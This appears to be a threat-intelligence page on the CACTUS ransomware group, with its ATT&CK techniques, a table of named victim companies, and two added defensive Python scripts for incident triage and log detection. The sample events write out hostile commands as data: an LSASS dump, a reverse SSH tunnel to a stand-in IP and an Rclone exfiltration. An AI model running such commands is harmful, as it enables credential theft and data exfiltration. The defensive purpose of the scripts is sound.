HackerFeeds

cactus

248 tracked victims · first seen 2023-07-03 · last activity 2025-03-17

Group profile

The CACTUS ransomware is reported to have emerged around March 2023. The group became known for exploiting vulnerabilities to gain initial access and to maintain a foothold inside the victim's infrastructure.

Little else is publicly documented about the group. Two encryption artifacts are consistently reported: after encryption a ransom note named 'cAcTuS.readme.txt' is dropped, and encrypted files are renamed with the '.cts1' extension. Victim communication and extortion negotiations are conducted over the Tox messaging service (bulk data exfiltration itself relies on separate tooling; see the Exfiltration entry in the TTP list below).

Source: https://github.com/crocodyli/ThreatActors-TTPs
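The two artifacts above are the quickest way to scope an incident on a recovered volume. The following is an added example, not code from the HackerFeeds page or from the operators: it walks a file tree, counts '.cts1' files and 'cAcTuS.readme.txt' notes, bounds the encryption window from file modification times, and flags directories that were encrypted but never received a note (an interrupted run, or a cleaned-up note). It assumes a local mount or forensic copy of the affected volume; the sample tree it builds for the demo is constructed, not real victim data.

```python
"""Added example, not code from the HackerFeeds page or from the CACTUS
operators: triage a file tree for the two encryption artefacts named in the
profile, the '.cts1' extension and the 'cAcTuS.readme.txt' ransom note.
Assumes a local mount or copy of the affected volume; stdlib only."""
import json
import os
import tempfile
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import List, Optional

ENCRYPTED_EXT = ".cts1"            # extension from the group profile
RANSOM_NOTE = "cactus.readme.txt"  # 'cAcTuS.readme.txt', compared case-insensitively


@dataclass
class CactusTriage:
    encrypted: List[str] = field(default_factory=list)  # paths of .cts1 files
    notes: List[str] = field(default_factory=list)      # paths of ransom notes
    first_mtime: Optional[float] = None                 # bounds of the encryption window
    last_mtime: Optional[float] = None

    def summary(self) -> dict:
        note_dirs = {os.path.dirname(p) for p in self.notes}
        enc_dirs = {os.path.dirname(p) for p in self.encrypted}

        def iso(t: Optional[float]) -> Optional[str]:
            return datetime.fromtimestamp(t, timezone.utc).isoformat() if t is not None else None

        return {
            "encrypted_files": len(self.encrypted),
            "ransom_notes": len(self.notes),
            "dirs_with_note": len(note_dirs),
            # encrypted directories that never got a note: the run was interrupted
            # there, or the note was cleaned up; either way worth a closer look
            "dirs_missing_note": len(enc_dirs - note_dirs),
            "window_start_utc": iso(self.first_mtime),
            "window_end_utc": iso(self.last_mtime),
        }


def triage_tree(root: str) -> CactusTriage:
    """Walk `root` and collect both artefacts. Name matching is case-insensitive
    because NTFS is case-preserving and forensic copies may alter case."""
    result = CactusTriage()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower == RANSOM_NOTE:
                result.notes.append(path)
            elif lower.endswith(ENCRYPTED_EXT):
                result.encrypted.append(path)
                mtime = os.stat(path).st_mtime
                if result.first_mtime is None or mtime < result.first_mtime:
                    result.first_mtime = mtime
                if result.last_mtime is None or mtime > result.last_mtime:
                    result.last_mtime = mtime
    return result


def build_sample_tree(base: str) -> None:
    """Constructed sample data for the demo (not real victim files): one
    directory that was encrypted and got its note, one that was encrypted
    without a note, and an unrelated file that must not match."""
    for rel, body in [
        ("finance/q1.xlsx.cts1", b"\x00" * 16),
        ("finance/budget.docx.cts1", b"\x00" * 16),
        ("finance/cAcTuS.readme.txt", b"constructed ransom note"),
        ("hr/payroll.pdf.cts1", b"\x00" * 16),
        ("hr/readme.txt", b"unrelated file"),
    ]:
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


def demo() -> dict:
    """Build the sample tree in a temp directory and return its triage summary."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return triage_tree(tmp).summary()


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run it against a mounted image with `triage_tree("/mnt/evidence")` rather than `demo()`; the modification-time window is only as trustworthy as the copy's timestamps, so take it from a forensic image, not from files that have been re-copied.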

MITRE ATT&CK TTPs

TA0001

Initial Access

  • T1190 Exploit Public-Facing Application

    The group exploits vulnerabilities in internet-facing VPN appliances to gain initial access.

TA0002

Execution

  • T1053.005 Scheduled Task/Job: Scheduled Task

    The group creates scheduled tasks to execute files used for C2 communication and to persist the ransomware payload.

  • T1072 Software Deployment Tools

    Actors gain access to third-party software deployment tools already installed on the network and use them to move laterally.

TA0003

Persistence

  • T1136 Create Account

    The group creates a service/system account that is used to launch the ransomware.

TA0005

Defense Evasion

  • T1027 Obfuscated Files or Information

    The group obfuscates files to evade detection by security controls.

  • T1027.002 Obfuscated Files or Information: Software Packing

    The ransomware payload is packed to evade detection by security controls.

  • T1562.001 Impair Defenses: Disable or Modify Tools

    The group disables or modifies security tools to avoid detection of its malware and of its access.

TA0006

Credential Access

  • T1003.001 OS Credential Dumping: LSASS Memory

    The group dumps LSASS memory to harvest credentials.

  • T1555.003 Credentials from Password Stores: Credentials from Web Browsers

    The group collects browser credential store files to recover saved passwords and uses them to access further accounts.

TA0007

Discovery

  • T1018 Remote System Discovery

    Actors enumerate other systems (hostnames, IP addresses and other identifiers) to plan lateral movement.

  • T1049 System Network Connections Discovery

    Actors use scanning tools to map the organization's infrastructure.

  • T1087 Account Discovery

    Actors enumerate accounts, user names and valid email addresses for later access.

  • T1087.002 Account Discovery: Domain Account

    Actors use scripts that parse Windows event logs to identify the domain accounts of logged-on users.

TA0008

Lateral Movement

  • T1021.001 Remote Services: Remote Desktop Protocol

    CACTUS actors use valid accounts to log into devices via RDP.

  • T1021.004 Remote Services: SSH

    After initial access, the group sets up an SSH tunnel to its C2 infrastructure.

  • T1570 Lateral Tool Transfer

    Actors copy tools and other files between systems to stage the attack and encrypt data.

TA0010

Exfiltration

  • T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

    Actors exfiltrate data to cloud storage services using tools such as Rclone.

TA0011

Command and Control

  • T1090 Proxy

    Actors route traffic between systems through a connection proxy to evade network security controls.

  • T1219 Remote Access Software

    Actors use RDP connections to reach other devices on the internal network.

TA0040

Impact

  • T1486 Data Encrypted for Impact

    The ransomware payload encrypts data and renames the encrypted files with a new extension.

TA0042

Resource Development

  • T1583.008 Acquire Infrastructure: Malvertising

    Microsoft attributed to this threat actor a malvertising campaign that delivered the Danabot malware, with CACTUS ransomware as the final payload.
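Several of the TTPs above leave a Windows Security log trail that a defender can hunt for without vendor tooling: 4698 for the scheduled task that persists the SSH tunnel (T1053.005, T1021.004), 4720 for the account the payload runs under (T1136), 4624 LogonType 10 for RDP movement by one account across many hosts (T1021.001, the same logon events the actors themselves parse under T1087.002), and 4688 process creation for LSASS dumping and Rclone (T1003.001, T1567.002). The following is an added example and not the page's own code: it runs simple rules plus an RDP fan-out aggregation over a constructed set of events. The field names mirror the Windows Security log but are an assumption about the shape of a SIEM JSON export, and the string patterns in the rules illustrate the techniques; they are not indicators published for this group.

```python
"""Added example, not the HackerFeeds page's own code: map Windows Security
event records to the CACTUS TTPs listed above and flag them. SAMPLE_EVENTS is
constructed, not real telemetry; its field names (EventID, Computer,
SubjectUserName, TargetUserName, LogonType, NewProcessName, CommandLine,
TaskContent) mirror the Windows Security log but are an assumption about
the shape of your SIEM export. The patterns in RULES illustrate the
techniques and are not indicators published for this group."""
import json
from collections import defaultdict
from typing import Callable, Dict, List, Tuple

# Constructed sample: one intrusion across FS01/DC01/APP02/SQL01 plus benign noise.
SAMPLE_EVENTS: List[dict] = [
    # T1053.005 + T1021.004: scheduled task that brings up a reverse SSH tunnel
    {"EventID": 4698, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "TaskName": "\\Microsoft\\Windows\\Updates\\Sync",
     "TaskContent": "C:\\ProgramData\\ssh.exe -N -R 9000:127.0.0.1:3389 user@203.0.113.10"},
    # T1136: new account created to launch the payload
    {"EventID": 4720, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "TargetUserName": "sysadm1n"},
    # T1021.001: RDP logons (LogonType 10) by one account across several hosts
    *[{"EventID": 4624, "Computer": host, "TargetUserName": "svc_backup",
       "LogonType": 10, "IpAddress": "10.0.5.23"}
      for host in ("FS01", "DC01", "APP02", "SQL01")],
    {"EventID": 4624, "Computer": "WS17", "TargetUserName": "alice",
     "LogonType": 10, "IpAddress": "10.0.7.41"},
    # T1003.001: LSASS dumped with a renamed dumping tool
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\Windows\\Temp\\pd.exe",
     "CommandLine": "pd.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp"},
    # T1567.002: Rclone pushing a share to cloud storage
    {"EventID": 4688, "Computer": "FS01", "SubjectUserName": "svc_backup",
     "NewProcessName": "C:\\ProgramData\\rclone.exe",
     "CommandLine": "rclone.exe copy D:\\Shares\\Finance remote:bucket --transfers 16"},
    # benign noise that must not match
    {"EventID": 4688, "Computer": "WS17", "SubjectUserName": "alice",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]


def _low(ev: dict, key: str) -> str:
    return str(ev.get(key, "")).lower()


# (technique, reason, predicate) for the single-event rules
RULES: List[Tuple[str, str, Callable[[dict], bool]]] = [
    ("T1053.005", "scheduled task launches an SSH client (tunnel persistence)",
     lambda ev: ev.get("EventID") == 4698 and "ssh" in _low(ev, "TaskContent")),
    ("T1136", "account created",
     lambda ev: ev.get("EventID") == 4720),
    ("T1003.001", "lsass referenced on a process command line",
     lambda ev: ev.get("EventID") == 4688 and "lsass" in _low(ev, "CommandLine")),
    ("T1567.002", "rclone executed (cloud exfiltration tooling)",
     lambda ev: ev.get("EventID") == 4688 and "rclone" in _low(ev, "NewProcessName")),
]


def match_rules(events: List[dict]) -> List[dict]:
    """Apply the single-event rules; one hit per (event, rule) pair."""
    hits = []
    for ev in events:
        for technique, why, pred in RULES:
            if pred(ev):
                hits.append({"technique": technique, "host": ev.get("Computer"),
                             "user": ev.get("SubjectUserName"), "why": why})
    return hits


def rdp_fan_out(events: List[dict], min_hosts: int = 3) -> Dict[str, List[str]]:
    """T1021.001: one account opening RDP sessions (LogonType 10) to many
    distinct hosts is the lateral-movement pattern; min_hosts is a tuning
    assumption, not a published threshold."""
    hosts: Dict[str, set] = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 4624 and ev.get("LogonType") == 10:
            hosts[ev["TargetUserName"]].add(ev["Computer"])
    return {user: sorted(h) for user, h in hosts.items() if len(h) >= min_hosts}


def triage(events: List[dict]) -> List[dict]:
    """Single-event hits plus the aggregated RDP fan-out hits."""
    hits = match_rules(events)
    for user, hs in rdp_fan_out(events).items():
        hits.append({"technique": "T1021.001", "host": ",".join(hs), "user": user,
                     "why": f"RDP logons to {len(hs)} hosts"})
    return hits


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

The single-event rules are deliberately loose (any `ssh` in a task action, any `lsass` on a command line) so they surface candidates for an analyst; the RDP rule is the one that needs aggregation, since a single LogonType 10 event is normal and only the spread across hosts by one account is the signal. Note that 4688 only carries a command line when "Include command line in process creation events" is enabled by policy.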

Recent victims

showing 50 of 248

Date | Website / victim | Sector | Country (ISO 3166-1 alpha-2)
---------- | ------------------------ | ------------------------------- | --
2024-12-25 | optiline.com | Construction | EE
2024-12-16 | fplfood.com | Agriculture and Food Production | US
2025-01-09 | biagibros.com | Transportation/Logistics | US
2025-03-17 | assaabloy.com | Manufacturing | SE
2025-03-17 | kyb.com | Technology | JP
2025-02-09 | tempel.com | Technology | US
2025-02-12 | thermoid.com | Manufacturing | US
2025-03-12 | baillie.com | Construction | US
2025-02-25 | urban1.com | Technology | US
2025-02-26 | rocketstores.com | Consumer Services | US
2025-03-03 | quigleyeye.com | Healthcare | US
2025-01-30 | stanleyconsultants.com | Business Services | US
2025-02-06 | caltrol.com | Technology | US
2025-01-30 | holtcat.com | Manufacturing | US
2025-02-06 | alphabaking.com | Agriculture and Food Production | US
2025-02-17 | bluedge.com | Technology | US
2025-02-25 | lifting.com | Manufacturing | US
2025-02-24 | chfindustries.com | Manufacturing | US
2025-02-06 | aiibeauty.com | Consumer Services | US
2025-02-06 | formanmills.com | Consumer Services | US
2025-02-06 | amalgamatedsugar.com | Agriculture and Food Production | US
2025-02-12 | everelgroup.com | Manufacturing | IT
2025-02-16 | regulvar.com | Construction | CA
2025-01-30 | electrocraft.com | Technology | US
2025-02-06 | associatedasset.com | Financial Services | US
2025-02-06 | grede.com | Manufacturing | US
2025-02-24 | branchgroup.com | Construction | US
2025-02-06 | pace-usa.com | Transportation/Logistics | US
2024-01-17 | steelwarehouse.com | Manufacturing | US
2025-01-21 | newhorizonsbaking.com | Agriculture and Food Production | US
2025-02-05 | uniekinc.com | Manufacturing | US
2025-01-16 | midwayimporting.com | Consumer Services | US
2025-01-15 | revitalash.com | Consumer Services | US
2025-02-03 | bestbrands.com | Consumer Services | US
2025-01-14 | kinseysinc.com | Manufacturing | US
2025-02-05 | steelerubber.com | Manufacturing | US
2025-02-05 | almostfamousclothing.com | Consumer Services | US
2025-02-17 | (entry removed following a request from the company) | Consumer Services | US
2025-02-05 | ssmcoop.com | Agriculture and Food Production | US
2025-01-21 | curtisint.com | Technology | CA
2025-02-12 | britannicahome.com | Consumer Services | US
2025-01-29 | uniquehd.com | Manufacturing | US
2024-01-17 | northernresponse.com | Consumer Services | CA
2025-01-28 | savoiesfoods.com | Agriculture and Food Production | US
2025-01-23 | mgainnovation.com | Technology | US
2024-12-18 | cornwelltools.com | Consumer Services | US
2025-01-24 | rashtiandrashti.com | Business Services | US
2025-01-16 | alkodistributors.com | Consumer Services | US
2025-01-14 | ttucorp.com | Technology | US
2025-01-16 | jayaapparelgroup.com | Consumer Services | US